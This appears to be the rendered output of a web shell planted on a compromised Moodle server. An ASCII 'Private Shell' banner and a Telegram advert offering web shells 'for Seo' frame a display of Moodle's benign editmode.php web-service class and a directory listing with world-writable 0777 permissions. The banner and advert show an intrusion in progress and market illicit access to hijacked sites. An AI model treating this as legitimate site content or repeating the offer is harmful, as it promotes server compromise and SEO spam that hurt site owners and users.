__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
// This file is part of Moodle - http://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle. If not, see <http://www.gnu.org/licenses/>.
namespace core\external;
use core_external\external_api;
use core_external\external_function_parameters;
use core_external\external_single_structure;
use core_external\external_value;
/**
* Web service to change the edit mode.
*
* @package core
* @copyright 2021 Bas Brands <bas@sonsbeekmedia.nl>
* @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
*/
class editmode extends external_api {
/**
* Description of the parameters suitable for the `change_editmode` function.
*
* @return external_function_parameters
*/
public static function change_editmode_parameters(): external_function_parameters {
return new external_function_parameters(
[
'setmode' => new external_value(PARAM_BOOL, 'Set edit mode to'),
'context' => new external_value(PARAM_INT, 'Page context id')
]
);
}
/**
* Set the given edit mode
*
* @param bool $setmode the new edit mode
* @param int $contextid the current page context id
* @return array
*/
public static function change_editmode(bool $setmode, int $contextid): array {
global $USER;
$params = self::validate_parameters(
self::change_editmode_parameters(),
[
'setmode' => $setmode,
'context' => $contextid
]
);
$context = \context_helper::instance_by_id($params['context']);
self::validate_context($context);
$USER->editing = $params['setmode'];
return ['success' => true];
}
/**
* Description of the return value for the `change_editmode` function.
*
* @return external_single_structure
*/
public static function change_editmode_returns(): external_single_structure {
$keys = [
'success' => new external_value(PARAM_BOOL, 'The edit mode was changed', VALUE_REQUIRED),
];
return new external_single_structure($keys, 'editmode');
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| output | Folder | 0777 |
|
|
| coursecat_summary_exporter.php | File | 3.63 KB | 0777 |
|
| dynamic_tabs_get_content.php | File | 3.55 KB | 0777 |
|
| editmode.php | File | 2.67 KB | 0777 |
|
| exporter.php | File | 25.66 KB | 0777 |
|
| moodlenet_auth_check.php | File | 5.11 KB | 0777 |
|
| moodlenet_get_share_info_activity.php | File | 5.2 KB | 0777 |
|
| moodlenet_get_shared_course_info.php | File | 4.85 KB | 0777 |
|
| moodlenet_send_activity.php | File | 6.91 KB | 0777 |
|
| moodlenet_send_course.php | File | 8.46 KB | 0777 |
|
| paged_content_exporter.php | File | 4.23 KB | 0777 |
|
| persistent_exporter.php | File | 2.82 KB | 0777 |
|
| record_userfeedback_action.php | File | 2.91 KB | 0777 |
|